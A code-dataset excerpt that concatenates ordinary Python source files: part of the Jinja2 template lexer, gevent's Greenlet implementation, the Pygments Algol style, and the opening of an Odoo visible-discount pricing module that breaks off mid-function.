TOKEN_LINESTATEMENT_BEGIN = intern('linestatement_begin')
TOKEN_LINESTATEMENT_END = intern('linestatement_end')
TOKEN_LINECOMMENT_BEGIN = intern('linecomment_begin')
TOKEN_LINECOMMENT_END = intern('linecomment_end')
TOKEN_LINECOMMENT = intern('linecomment')
TOKEN_DATA = intern('data')
TOKEN_INITIAL = intern('initial')
TOKEN_EOF = intern('eof')
# bind operators to token types
operators = {
'+': TOKEN_ADD,
'-': TOKEN_SUB,
'/': TOKEN_DIV,
'//': TOKEN_FLOORDIV,
'*': TOKEN_MUL,
'%': TOKEN_MOD,
'**': TOKEN_POW,
'~': TOKEN_TILDE,
'[': TOKEN_LBRACKET,
']': TOKEN_RBRACKET,
'(': TOKEN_LPAREN,
')': TOKEN_RPAREN,
'{': TOKEN_LBRACE,
'}': TOKEN_RBRACE,
'==': TOKEN_EQ,
'!=': TOKEN_NE,
'>': TOKEN_GT,
'>=': TOKEN_GTEQ,
'<': TOKEN_LT,
'<=': TOKEN_LTEQ,
'=': TOKEN_ASSIGN,
'.': TOKEN_DOT,
':': TOKEN_COLON,
'|': TOKEN_PIPE,
',': TOKEN_COMMA,
';': TOKEN_SEMICOLON
}
reverse_operators = dict([(v, k) for k, v in iteritems(operators)])
assert len(operators) == len(reverse_operators), 'operators dropped'
operator_re = re.compile('(%s)' % '|'.join(re.escape(x) for x in
sorted(operators, key=lambda x: -len(x))))
ignored_tokens = frozenset([TOKEN_COMMENT_BEGIN, TOKEN_COMMENT,
TOKEN_COMMENT_END, TOKEN_WHITESPACE,
TOKEN_LINECOMMENT_BEGIN, TOKEN_LINECOMMENT_END,
TOKEN_LINECOMMENT])
ignore_if_empty = frozenset([TOKEN_WHITESPACE, TOKEN_DATA,
TOKEN_COMMENT, TOKEN_LINECOMMENT])
def _describe_token_type(token_type):
if token_type in reverse_operators:
return reverse_operators[token_type]
return {
TOKEN_COMMENT_BEGIN: 'begin of comment',
TOKEN_COMMENT_END: 'end of comment',
TOKEN_COMMENT: 'comment',
TOKEN_LINECOMMENT: 'comment',
TOKEN_BLOCK_BEGIN: 'begin of statement block',
TOKEN_BLOCK_END: 'end of statement block',
TOKEN_VARIABLE_BEGIN: 'begin of print statement',
TOKEN_VARIABLE_END: 'end of print statement',
TOKEN_LINESTATEMENT_BEGIN: 'begin of line statement',
TOKEN_LINESTATEMENT_END: 'end of line statement',
TOKEN_DATA: 'template data / text',
TOKEN_EOF: 'end of template'
}.get(token_type, token_type)
def describe_token(token):
"""Returns a description of the token."""
if token.type == 'name':
return token.value
return _describe_token_type(token.type)
def describe_token_expr(expr):
"""Like `describe_token` but for token expressions."""
if ':' in expr:
type, value = expr.split(':', 1)
if type == 'name':
return value
else:
type = expr
return _describe_token_type(type)
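# Example (added note): describe_token_expr('name:endfor') returns 'endfor',
# while describe_token_expr('block_end') maps through the table above to
# 'end of statement block'.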
def count_newlines(value):
"""Count the number of newline characters in the string. This is
useful for extensions that filter a stream.
"""
return len(newline_re.findall(value))
def compile_rules(environment):
"""Compiles all the rules from the environment into a list of rules."""
e = re.escape
rules = [
(len(environment.comment_start_string), 'comment',
e(environment.comment_start_string)),
(len(environment.block_start_string), 'block',
e(environment.block_start_string)),
(len(environment.variable_start_string), 'variable',
e(environment.variable_start_string))
]
if environment.line_statement_prefix is not None:
rules.append((len(environment.line_statement_prefix), 'linestatement',
r'^[ \t\v]*' + e(environment.line_statement_prefix)))
if environment.line_comment_prefix is not None:
rules.append((len(environment.line_comment_prefix), 'linecomment',
r'(?:^|(?<=\S))[^\S\r\n]*' +
e(environment.line_comment_prefix)))
return [x[1:] for x in sorted(rules, reverse=True)]
class Failure(object):
"""Class that raises a `TemplateSyntaxError` if called.
Used by the `Lexer` to specify known errors.
"""
def __init__(self, message, cls=TemplateSyntaxError):
self.message = message
self.error_class = cls
def __call__(self, lineno, filename):
raise self.error_class(self.message, lineno, filename)
class Token(tuple):
"""Token class."""
__slots__ = ()
lineno, type, value = (property(itemgetter(x)) for x in range(3))
def __new__(cls, lineno, type, value):
return tuple.__new__(cls, (lineno, intern(str(type)), value))
def __str__(self):
if self.type in reverse_operators:
return reverse_operators[self.type]
elif self.type == 'name':
return self.value
return self.type
def test(self, expr):
"""Test a token against a token expression. This can either be a
token type or ``'token_type:token_value'``. This can only test
against string values and types.
"""
# here we do a regular string equality check as test_any is usually
# passed an iterable of not interned strings.
if self.type == expr:
return True
elif ':' in expr:
return expr.split(':', 1) == [self.type, self.value]
return False
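    # e.g. (added note): Token(1, 'name', 'foo').test('name:foo') is True,
    # while Token(1, 'name', 'foo').test('string') is False.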
def test_any(self, *iterable):
"""Test against multiple token expressions."""
for expr in iterable:
if self.test(expr):
return True
return False
def __repr__(self):
return 'Token(%r, %r, %r)' % (
self.lineno,
self.type,
self.value
)
@implements_iterator
class TokenStreamIterator(object):
"""The iterator for tokenstreams. Iterate over the stream
until the eof token is reached.
"""
def __init__(self, stream):
self.stream = stream
def __iter__(self):
return self
def __next__(self):
token = self.stream.current
if token.type is TOKEN_EOF:
self.stream.close()
raise StopIteration()
next(self.stream)
return token
@implements_iterator
class TokenStream(object):
"""A token stream is an iterable that yields :class:`Token`\s. The
parser however does not iterate over it but calls :meth:`next` to go
one token ahead. The current active token is stored as :attr:`current`.
"""
def __init__(self, generator, name, filename):
self._iter = iter(generator)
self._pushed = deque()
self.name = name
self.filename = filename
self.closed = False
self.current = Token(1, TOKEN_INITIAL, '')
next(self)
def __iter__(self):
return TokenStreamIterator(self)
def __bool__(self):
return bool(self._pushed) or self.current.type is not TOKEN_EOF
__nonzero__ = __bool__ # py2
eos = property(lambda x: not x, doc="Are we at the end of the stream?")
def push(self, token):
"""Push a token back to the stream."""
self._pushed.append(token)
def look(self):
"""Look at the next token."""
old_token = next(self)
result = self.current
self.push(result)
self.current = old_token
return result
def skip(self, n=1):
"""Got n tokens ahead."""
for x in range(n):
next(self)
def next_if(self, expr):
"""Perform the token test and return the token if it matched.
Otherwise the return value is `None`.
"""
if self.current.test(expr):
return next(self)
def skip_if(self, expr):
"""Like :meth:`next_if` but only returns `True` or `False`."""
return self.next_if(expr) is not None
def __next__(self):
"""Go one token ahead and return the old one"""
rv = self.current
if self._pushed:
self.current = self._pushed.popleft()
elif self.current.type is not TOKEN_EOF:
try:
self.current = next(self._iter)
except StopIteration:
self.close()
return rv
def close(self):
"""Close the stream."""
self.current = Token(self.current.lineno, TOKEN_EOF, '')
self._iter = None
self.closed = True
def expect(self, expr):
"""Expect a given token type and return it. This accepts the same
argument as :meth:`jinja2.lexer.Token.test`.
"""
if not self.current.test(expr):
expr = describe_token_expr(expr)
if self.current.type is TOKEN_EOF:
raise TemplateSyntaxError('unexpected end of template, '
'expected %r.' % expr,
self.current.lineno,
self.name, self.filename)
raise TemplateSyntaxError("expected token %r, got %r" %
(expr, describe_token(self.current)),
self.current.lineno,
self.name, self.filename)
try:
return self.current
finally:
next(self)
def get_lexer(environment):
"""Return a lexer which is probably cached."""
key = (environment.block_start_string,
environment.block_end_string,
environment.variable_start_string,
environment.variable_end_string,
environment.comment_start_string,
environment.comment_end_string,
environment.line_statement_prefix,
environment.line_comment_prefix,
environment.trim_blocks,
environment.lstrip_blocks,
environment.newline_sequence,
environment.keep_trailing_newline)
lexer = _lexer_cache.get(key)
if lexer is None:
lexer = Lexer(environment)
_lexer_cache[key] = lexer
return lexer
class Lexer(object):
"""Class that implements a lexer for a given environment. Automatically
created by the environment class, usually you don't have to do that.
Note that the lexer is not automatically bound to an environment.
Multiple environments can share the same lexer.
"""
def __init__(self, environment):
# shortcuts
c = lambda x: re.compile(x, re.M | re.S)
e = re.escape
# lexing rules for tags
tag_rules = [
(whitespace_re, TOKEN_WHITESPACE, None),
(float_re, TOKEN_FLOAT, None),
(integer_re, TOKEN_INTEGER, None),
(name_re, TOKEN_NAME, None),
(string_re, TOKEN_STRING, None),
(operator_re, TOKEN_OPERATOR, None)
]
# assemble the root lexing rule. because "|" is ungreedy
# we have to sort by length so that the lexer continues working
# as expected when we have parsing rules like <% for block and
# <%= for variables. (if someone wants asp like syntax)
# variables are just part of the rules if variable processing
# is required.
root_tag_rules = compile_rules(environment)
# block suffix if trimming is enabled
block_suffix_re = environment.trim_blocks and '\\n?' or ''
# strip leading spaces if lstrip_blocks is enabled
prefix_re = {}
if environment.lstrip_blocks:
# use '{%+' to manually disable lstrip_blocks behavior
no_lstrip_re = e('+')
# detect overlap between block and variable or comment strings
block_diff = c(r'^%s(.*)' % e(environment.block_start_string))
# make sure we don't mistake a block for a variable or a comment
m = block_diff.match(environment.comment_start_string)
no_lstrip_re += m and r'|%s' % e(m.group(1)) or ''
m = block_diff.match(environment.variable_start_string)
no_lstrip_re += m and r'|%s' % e(m.group(1)) or ''
# detect overlap between comment and variable strings
comment_diff = c(r'^%s(.*)' % e(environment.comment_start_string))
m = comment_diff.match(environment.variable_start_string)
no_variable_re = m and r'(?!%s)' % e(m.group(1)) or ''
lstrip_re = r'^[ \t]*'
block_prefix_re = r'%s%s(?!%s)|%s\+?' % (
lstrip_re,
e(environment.block_start_string),
no_lstrip_re,
e(environment.block_start_string),
)
comment_prefix_re = r'%s%s%s|%s\+?' % (
lstrip_re,
e(environment.comment_start_string),
no_variable_re,
e(environment.comment_start_string),
)
prefix_re['block'] = block_prefix_re
prefix_re['comment'] = comment_prefix_re
else:
block_prefix_re = '%s' % e(environment.block_start_string)
self.newline_sequence = environment.newline_sequence
self.keep_trailing_newline = environment.keep_trailing_newline
# global lexing rules
self.rules = {
'root': [
# directives
(c('(.*?)(?:%s)' % '|'.join(
[r'(?P<raw_begin>(?:\s*%s\-|%s)\s*raw\s*(?:\-%s\s*|%s))' % (
e(environment.block_start_string),
block_prefix_re,
e(environment.block_end_string),
e(environment.block_end_string)
)] + [
r'(?P<%s_begin>\s*%s\-|%s)' % (n, r, prefix_re.get(n,r))
for n, r in root_tag_rules
])), (TOKEN_DATA, '#bygroup'), '#bygroup'),
# data
(c('.+'), TOKEN_DATA, None)
],
# comments
TOKEN_COMMENT_BEGIN: [
(c(r'(.*?)((?:\-%s\s*|%s)%s)' % (
e(environment.comment_end_string),
e(environment.comment_end_string),
block_suffix_re
)), (TOKEN_COMMENT, TOKEN_COMMENT_END), '#pop'),
(c('(.)'), (Failure('Missing end of comment tag'),), None)
],
# blocks
TOKEN_BLOCK_BEGIN: [
(c('(?:\-%s\s*|%s)%s' % (
e(environment.block_end_string),
e(environment.block_end_string),
block_suffix_re
)), TOKEN_BLOCK_END, '#pop'),
] + tag_rules,
# variables
TOKEN_VARIABLE_BEGIN: [
(c('\-%s\s*|%s' % (
e(environment.variable_end_string),
e(environment.variable_end_string)
)), TOKEN_VARIABLE_END, '#pop')
] + tag_rules,
# raw block
TOKEN_RAW_BEGIN: [
(c('(.*?)((?:\s*%s\-|%s)\s*endraw\s*(?:\-%s\s*|%s%s))' % (
e(environment.block_start_string),
block_prefix_re,
e(environment.block_end_string),
e(environment.block_end_string),
block_suffix_re
)), (TOKEN_DATA, TOKEN_RAW_END), '#pop'),
(c('(.)'), (Failure('Missing end of raw directive'),), None)
],
# line statements
TOKEN_LINESTATEMENT_BEGIN: [
(c(r'\s*(\n|$)'), TOKEN_LINESTATEMENT_END, '#pop')
] + tag_rules,
# line comments
TOKEN_LINECOMMENT_BEGIN: [
(c(r'(.*?)()(?=\n|$)'), (TOKEN_LINECOMMENT,
TOKEN_LINECOMMENT_END), '#pop')
]
}
def _normalize_newlines(self, value):
"""Called for strings and template data to normalize it to unicode."""
return newline_re.sub(self.newline_sequence, value)
def tokenize(self, source, name=None, filename=None, state=None):
"""Calls tokeniter + tokenize and wraps it in a token stream.
"""
stream = self.tokeniter(source, name, filename, state)
return TokenStream(self.wrap(stream, name, filename), name, filename)
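    # Illustrative sketch (added; assumes the default '{{ ... }}' delimiters):
    #     >>> [t.type for t in lexer.tokenize(u'Hi {{ name }}!')]
    #     ['data', 'variable_begin', 'name', 'variable_end', 'data']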
def wrap(self, stream, name=None, filename=None):
"""This is called with the stream as returned by `tokenize` and wraps
every token in a :class:`Token` and converts the value.
"""
for lineno, token, value in stream:
if token in ignored_tokens:
continue
elif token == 'linestatement_begin':
token = 'block_begin'
elif token == 'linestatement_end':
token = 'block_end'
# we are not interested in those tokens in the parser
elif token in ('raw_begin', 'raw_end'):
continue
elif token == 'data':
value = self._normalize_newlines(value)
elif token == 'keyword':
token = value
elif token == 'name':
value = str(value)
elif token == 'string':
# try to unescape string
try:
value = self._normalize_newlines(value[1:-1]) \
.encode('ascii', 'backslashreplace') \
.decode('unicode-escape')
except Exception as e:
msg = str(e).split(':')[-1].strip()
raise TemplateSyntaxError(msg, lineno, name, filename)
# if we can express it as bytestring (ascii only)
# we do that for support of semi broken APIs
# as datetime.datetime.strftime. On python 3 this
# call becomes a noop thanks to 2to3
if PY2:
try:
value = value.encode('ascii')
except UnicodeError:
pass
elif token == 'integer':
value = int(value)
elif token == 'float':
value = float(value)
elif token == 'operator':
token = operators[value]
yield Token(lineno, token, value)
def tokeniter(self, source, name, filename=None, state=None):
"""This method tokenizes the text and returns the tokens in a
generator. Use this method if you just want to tokenize a template.
"""
source = text_type(source)
lines = source.splitlines()
if self.keep_trailing_newline and source:
for newline in ('\r\n', '\r', '\n'):
if source.endswith(newline):
lines.append('')
break
source = '\n'.join(lines)
pos = 0
lineno = 1
stack = ['root']
if state is not None and state != 'root':
assert state in ('variable', 'block'), 'invalid state'
stack.append(state + '_begin')
else:
state = 'root'
statetokens = self.rules[stack[-1]]
source_length = len(source)
balancing_stack = []
while 1:
# tokenizer loop
for regex, tokens, new_state in statetokens:
m = regex.match(source, pos)
# if no match we try again with the next rule
if m is None:
continue
# we only match blocks and variables if braces / parentheses
# are balanced. continue parsing with the lower rule which
# is the operator rule. do this only if the end tags look
# like operators
if balancing_stack and \
tokens in ('variable_end', 'block_end',
'linestatement_end'):
continue
# tuples support more options
if isinstance(tokens, tuple):
for idx, token in enumerate(tokens):
# failure group
if token.__class__ is Failure:
raise token(lineno, filename)
# bygroup is a bit more complex, in that case we
# yield for the current token the first named
# group that matched
elif token == '#bygroup':
for key, value in iteritems(m.groupdict()):
if value is not None:
yield lineno, key, value
lineno += value.count('\n')
break
else:
raise RuntimeError('%r wanted to resolve '
'the token dynamically'
' but no group matched'
% regex)
# normal group
else:
data = m.group(idx + 1)
if data or token not in ignore_if_empty:
yield lineno, token, data
lineno += data.count('\n')
# strings as token just are yielded as it.
else:
data = m.group()
# update brace/parentheses balance
if tokens == 'operator':
if data == '{':
balancing_stack.append('}')
elif data == '(':
balancing_stack.append(')')
elif data == '[':
balancing_stack.append(']')
elif data in ('}', ')', ']'):
if not balancing_stack:
raise TemplateSyntaxError('unexpected \'%s\'' %
data, lineno, name,
filename)
expected_op = balancing_stack.pop()
if expected_op != data:
raise TemplateSyntaxError('unexpected \'%s\', '
'expected \'%s\'' %
(data, expected_op),
lineno, name,
filename)
# yield items
if data or tokens not in ignore_if_empty:
yield lineno, tokens, data
lineno += data.count('\n')
# fetch new position into new variable so that we can check
                # if there is an internal parsing error which would result
# in an infinite loop
pos2 = m.end()
# handle state changes
if new_state is not None:
# remove the uppermost state
if new_state == '#pop':
stack.pop()
# resolve the new state by group checking
elif new_state == '#bygroup':
for key, value in iteritems(m.groupdict()):
if value is not None:
stack.append(key)
break
else:
raise RuntimeError('%r wanted to resolve the '
'new state dynamically but'
' no group matched' %
regex)
# direct state name given
else:
stack.append(new_state)
statetokens = self.rules[stack[-1]]
# we are still at the same position and no stack change.
# this means a loop without break condition, avoid that and
# raise error
elif pos2 == pos:
raise RuntimeError('%r yielded empty string without '
'stack change' % regex)
                # publish the new position and start again
pos = pos2
break
# if loop terminated without break we haven't found a single match
# either we are at the end of the file or we have a problem
else:
# end of text
if pos >= source_length:
return
# something went wrong
raise TemplateSyntaxError('unexpected char %r at %d' %
(source[pos], pos), lineno,
name, filename)
|
hexlism/xx_net | refs/heads/master | python27/1.0/lib/darwin/gevent/greenlet.py | 22 | # Copyright (c) 2009-2012 Denis Bilenko. See LICENSE for details.
import sys
from gevent.hub import greenlet, getcurrent, get_hub, GreenletExit, Waiter, PY3, iwait, wait
from gevent.timeout import Timeout
from collections import deque
__all__ = ['Greenlet',
'joinall',
'killall']
class SpawnedLink(object):
"""A wrapper around link that calls it in another greenlet.
Can be called only from main loop.
"""
__slots__ = ['callback']
def __init__(self, callback):
if not callable(callback):
raise TypeError("Expected callable: %r" % (callback, ))
self.callback = callback
def __call__(self, source):
g = greenlet(self.callback, get_hub())
g.switch(source)
def __hash__(self):
return hash(self.callback)
def __eq__(self, other):
return self.callback == getattr(other, 'callback', other)
def __str__(self):
return str(self.callback)
def __repr__(self):
return repr(self.callback)
def __getattr__(self, item):
assert item != 'callback'
return getattr(self.callback, item)
class SuccessSpawnedLink(SpawnedLink):
"""A wrapper around link that calls it in another greenlet only if source succeed.
Can be called only from main loop.
"""
__slots__ = []
def __call__(self, source):
if source.successful():
return SpawnedLink.__call__(self, source)
class FailureSpawnedLink(SpawnedLink):
"""A wrapper around link that calls it in another greenlet only if source failed.
Can be called only from main loop.
"""
__slots__ = []
def __call__(self, source):
if not source.successful():
return SpawnedLink.__call__(self, source)
class Greenlet(greenlet):
"""A light-weight cooperatively-scheduled execution unit."""
def __init__(self, run=None, *args, **kwargs):
hub = get_hub()
greenlet.__init__(self, parent=hub)
if run is not None:
self._run = run
self.args = args
self.kwargs = kwargs
self._links = deque()
self.value = None
self._exception = _NONE
self._notifier = None
self._start_event = None
@property
def loop(self):
# needed by killall
return self.parent.loop
if PY3:
def __bool__(self):
return self._start_event is not None and self._exception is _NONE
else:
def __nonzero__(self):
return self._start_event is not None and self._exception is _NONE
@property
def started(self):
# DEPRECATED
return bool(self)
def ready(self):
"""Return true if and only if the greenlet has finished execution."""
return self.dead or self._exception is not _NONE
def successful(self):
"""Return true if and only if the greenlet has finished execution successfully,
that is, without raising an error."""
return self._exception is None
def __repr__(self):
classname = self.__class__.__name__
result = '<%s at %s' % (classname, hex(id(self)))
formatted = self._formatinfo()
if formatted:
result += ': ' + formatted
return result + '>'
def _formatinfo(self):
try:
return self._formatted_info
except AttributeError:
pass
try:
result = getfuncname(self.__dict__['_run'])
except Exception:
pass
else:
args = []
if self.args:
args = [repr(x)[:50] for x in self.args]
if self.kwargs:
args.extend(['%s=%s' % (key, repr(value)[:50]) for (key, value) in self.kwargs.items()])
if args:
result += '(' + ', '.join(args) + ')'
# it is important to save the result here, because once the greenlet exits '_run' attribute will be removed
self._formatted_info = result
return result
return ''
@property
def exception(self):
"""Holds the exception instance raised by the function if the greenlet has finished with an error.
Otherwise ``None``.
"""
if self._exception is not _NONE:
return self._exception
def throw(self, *args):
"""Immediatelly switch into the greenlet and raise an exception in it.
Should only be called from the HUB, otherwise the current greenlet is left unscheduled forever.
        To raise an exception in a safe manner from any greenlet, use :meth:`kill`.
If a greenlet was started but never switched to yet, then also
a) cancel the event that will start it
b) fire the notifications as if an exception was raised in a greenlet
"""
if self._start_event is None:
self._start_event = _dummy_event
else:
self._start_event.stop()
try:
greenlet.throw(self, *args)
finally:
if self._exception is _NONE and self.dead:
# the greenlet was never switched to before and it will never be, _report_error was not called
# the result was not set and the links weren't notified. let's do it here.
# checking that self.dead is true is essential, because throw() does not necessarily kill the greenlet
# (if the exception raised by throw() is caught somewhere inside the greenlet).
if len(args) == 1:
arg = args[0]
#if isinstance(arg, type):
if type(arg) is type(Exception):
args = (arg, arg(), None)
else:
args = (type(arg), arg, None)
elif not args:
args = (GreenletExit, GreenletExit(), None)
self._report_error(args)
def start(self):
"""Schedule the greenlet to run in this loop iteration"""
if self._start_event is None:
self._start_event = self.parent.loop.run_callback(self.switch)
def start_later(self, seconds):
"""Schedule the greenlet to run in the future loop iteration *seconds* later"""
if self._start_event is None:
self._start_event = self.parent.loop.timer(seconds)
self._start_event.start(self.switch)
@classmethod
def spawn(cls, *args, **kwargs):
"""Return a new :class:`Greenlet` object, scheduled to start.
The arguments are passed to :meth:`Greenlet.__init__`.
"""
g = cls(*args, **kwargs)
g.start()
return g
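    # Illustrative usage sketch (added example):
    #     >>> g = Greenlet.spawn(lambda x: x * 2, 21)
    #     >>> g.join()
    #     >>> g.value
    #     42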
@classmethod
def spawn_later(cls, seconds, *args, **kwargs):
"""Return a Greenlet object, scheduled to start *seconds* later.
The arguments are passed to :meth:`Greenlet.__init__`.
"""
g = cls(*args, **kwargs)
g.start_later(seconds)
return g
def kill(self, exception=GreenletExit, block=True, timeout=None):
"""Raise the exception in the greenlet.
If block is ``True`` (the default), wait until the greenlet dies or the optional timeout expires.
If block is ``False``, the current greenlet is not unscheduled.
The function always returns ``None`` and never raises an error.
`Changed in version 0.13.0:` *block* is now ``True`` by default.
"""
# XXX this function should not switch out if greenlet is not started but it does
# XXX fix it (will have to override 'dead' property of greenlet.greenlet)
if self._start_event is None:
self._start_event = _dummy_event
else:
self._start_event.stop()
if not self.dead:
waiter = Waiter()
self.parent.loop.run_callback(_kill, self, exception, waiter)
if block:
waiter.get()
self.join(timeout)
# it should be OK to use kill() in finally or kill a greenlet from more than one place;
# thus it should not raise when the greenlet is already killed (= not started)
def get(self, block=True, timeout=None):
"""Return the result the greenlet has returned or re-raise the exception it has raised.
If block is ``False``, raise :class:`gevent.Timeout` if the greenlet is still alive.
If block is ``True``, unschedule the current greenlet until the result is available
or the timeout expires. In the latter case, :class:`gevent.Timeout` is raised.
"""
if self.ready():
if self.successful():
return self.value
else:
raise self._exception
if block:
switch = getcurrent().switch
self.rawlink(switch)
try:
t = Timeout.start_new(timeout)
try:
result = self.parent.switch()
assert result is self, 'Invalid switch into Greenlet.get(): %r' % (result, )
finally:
t.cancel()
except:
# unlinking in 'except' instead of finally is an optimization:
# if switch occurred normally then link was already removed in _notify_links
# and there's no need to touch the links set.
# Note, however, that if "Invalid switch" assert was removed and invalid switch
# did happen, the link would remain, causing another invalid switch later in this greenlet.
self.unlink(switch)
raise
if self.ready():
if self.successful():
return self.value
else:
raise self._exception
else:
raise Timeout
def join(self, timeout=None):
"""Wait until the greenlet finishes or *timeout* expires.
Return ``None`` regardless.
"""
if self.ready():
return
else:
switch = getcurrent().switch
self.rawlink(switch)
try:
t = Timeout.start_new(timeout)
try:
result = self.parent.switch()
assert result is self, 'Invalid switch into Greenlet.join(): %r' % (result, )
finally:
t.cancel()
except Timeout:
self.unlink(switch)
if sys.exc_info()[1] is not t:
raise
except:
self.unlink(switch)
raise
def _report_result(self, result):
self._exception = None
self.value = result
if self._links and not self._notifier:
self._notifier = self.parent.loop.run_callback(self._notify_links)
def _report_error(self, exc_info):
exception = exc_info[1]
if isinstance(exception, GreenletExit):
self._report_result(exception)
return
self._exception = exception
if self._links and not self._notifier:
self._notifier = self.parent.loop.run_callback(self._notify_links)
self.parent.handle_error(self, *exc_info)
def run(self):
try:
if self._start_event is None:
self._start_event = _dummy_event
else:
self._start_event.stop()
try:
result = self._run(*self.args, **self.kwargs)
except:
self._report_error(sys.exc_info())
return
self._report_result(result)
finally:
self.__dict__.pop('_run', None)
self.__dict__.pop('args', None)
self.__dict__.pop('kwargs', None)
def rawlink(self, callback):
"""Register a callable to be executed when the greenlet finishes the execution.
WARNING: the callable will be called in the HUB greenlet.
"""
if not callable(callback):
raise TypeError('Expected callable: %r' % (callback, ))
self._links.append(callback)
if self.ready() and self._links and not self._notifier:
self._notifier = self.parent.loop.run_callback(self._notify_links)
def link(self, callback, SpawnedLink=SpawnedLink):
"""Link greenlet's completion to a callable.
The *callback* will be called with this instance as an argument
once this greenlet's dead. A callable is called in its own greenlet.
"""
self.rawlink(SpawnedLink(callback))
def unlink(self, callback):
"""Remove the callback set by :meth:`link` or :meth:`rawlink`"""
try:
self._links.remove(callback)
except ValueError:
pass
def link_value(self, callback, SpawnedLink=SuccessSpawnedLink):
"""Like :meth:`link` but *callback* is only notified when the greenlet has completed successfully"""
self.link(callback, SpawnedLink=SpawnedLink)
def link_exception(self, callback, SpawnedLink=FailureSpawnedLink):
"""Like :meth:`link` but *callback* is only notified when the greenlet dies because of unhandled exception"""
self.link(callback, SpawnedLink=SpawnedLink)
def _notify_links(self):
while self._links:
link = self._links.popleft()
try:
link(self)
except:
self.parent.handle_error((link, self), *sys.exc_info())
class _dummy_event(object):
def stop(self):
pass
_dummy_event = _dummy_event()
def _kill(greenlet, exception, waiter):
try:
greenlet.throw(exception)
except:
# XXX do we need this here?
greenlet.parent.handle_error(greenlet, *sys.exc_info())
waiter.switch()
def joinall(greenlets, timeout=None, raise_error=False, count=None):
if not raise_error:
wait(greenlets, timeout=timeout)
else:
for obj in iwait(greenlets, timeout=timeout):
if getattr(obj, 'exception', None) is not None:
raise obj.exception
if count is not None:
count -= 1
if count <= 0:
break
def _killall3(greenlets, exception, waiter):
diehards = []
for g in greenlets:
if not g.dead:
try:
g.throw(exception)
except:
g.parent.handle_error(g, *sys.exc_info())
if not g.dead:
diehards.append(g)
waiter.switch(diehards)
def _killall(greenlets, exception):
for g in greenlets:
if not g.dead:
try:
g.throw(exception)
except:
g.parent.handle_error(g, *sys.exc_info())
def killall(greenlets, exception=GreenletExit, block=True, timeout=None):
if not greenlets:
return
loop = greenlets[0].loop
if block:
waiter = Waiter()
loop.run_callback(_killall3, greenlets, exception, waiter)
t = Timeout.start_new(timeout)
try:
alive = waiter.get()
if alive:
joinall(alive, raise_error=False)
finally:
t.cancel()
else:
loop.run_callback(_killall, greenlets, exception)
if PY3:
_meth_self = "__self__"
else:
_meth_self = "im_self"
def getfuncname(func):
if not hasattr(func, _meth_self):
try:
funcname = func.__name__
except AttributeError:
pass
else:
if funcname != '<lambda>':
return funcname
return repr(func)
_NONE = Exception("Neither exception nor value")
|
qmarlats/pyquizz | refs/heads/master | env-3/lib/python3.5/site-packages/pygments/styles/algol.py | 37 | # -*- coding: utf-8 -*-
"""
pygments.styles.algol
~~~~~~~~~~~~~~~~~~~~~
Algol publication style.
This style renders source code for publication of algorithms in
scientific papers and academic texts, where its format is frequently used.
It is based on the style of the revised Algol-60 language report[1].
o No colours, only black, white and shades of grey are used.
o Keywords are rendered in lowercase underline boldface.
o Builtins are rendered in lowercase boldface italic.
o Docstrings and pragmas are rendered in dark grey boldface.
o Library identifiers are rendered in dark grey boldface italic.
o Comments are rendered in grey italic.
To render keywords without underlining, refer to the `Algol_Nu` style.
For lowercase conversion of keywords and builtins in languages where
these are not or might not be lowercase, a supporting lexer is required.
The Algol and Modula-2 lexers automatically convert to lowercase whenever
this style is selected.
[1] `Revised Report on the Algorithmic Language Algol-60 <http://www.masswerk.at/algol60/report.htm>`
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Operator
class AlgolStyle(Style):
background_color = "#ffffff"
default_style = ""
styles = {
Comment: "italic #888",
Comment.Preproc: "bold noitalic #888",
Comment.Special: "bold noitalic #888",
Keyword: "underline bold",
Keyword.Declaration: "italic",
Name.Builtin: "bold italic",
Name.Builtin.Pseudo: "bold italic",
Name.Namespace: "bold italic #666",
Name.Class: "bold italic #666",
Name.Function: "bold italic #666",
Name.Variable: "bold italic #666",
Name.Constant: "bold italic #666",
Operator.Word: "bold",
String: "italic #666",
Error: "border:#FF0000"
}
|
Innovahn/odoo.old | refs/heads/master | addons/product_visible_discount/product_visible_discount.py | 28 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2008 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class product_pricelist(osv.osv):
_inherit = 'product.pricelist'
_columns ={
'visible_discount': fields.boolean('Visible Discount'),
}
_defaults = {
'visible_discount': True,
}
class sale_order_line(osv.osv):
_inherit = "sale.order.line"
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False,
fiscal_position=False, flag=False, context=None):
def get_real_price(res_dict, product_id, qty, uom, pricelist):
item_obj = self.pool.get('product.pricelist.item')
price_type_obj = self.pool.get('product.price.type')
product_obj = self.pool.get('product.product')
field_name = 'list_price'
product = product_obj.browse(cr, uid, product_id, context)
product_read = product_obj.read(cr, uid, [product_id], [field_name], context=context)[0]
factor = 1.0
if uom and uom != product.uom_id.id:
product_uom_obj = self.pool.get('product.uom')
uom_data = product_uom_obj.browse(cr, uid, product.uom_id.id)
factor = uom_data.factor
return product_read[field_name] * factor
        res = super(sale_order_line, self).product_id_change(
            cr, uid, ids, pricelist, product, qty, uom, qty_uos, uos, name,
            partner_id, lang, update_tax, date_order, packaging=packaging,
            fiscal_position=fiscal_position, flag=flag, context=context)
context = {'lang': lang, 'partner_id': partner_id}
        result = res['value']
        pricelist_obj = self.pool.get('product.pricelist')
product_obj = self.pool.get('product.product')
if product and pricelist:
            if result.get('price_unit', False):
                price = result['price_unit']
else:
return res
product = product_obj.browse(cr, uid, product, context)
list_price = pricelist_obj.price_get(cr, uid, [pricelist],
product.id, qty or 1.0, partner_id, {'uom': uom,'date': date_order })
so_pricelist = pricelist_obj.browse(cr, uid, pricelist, context=context)
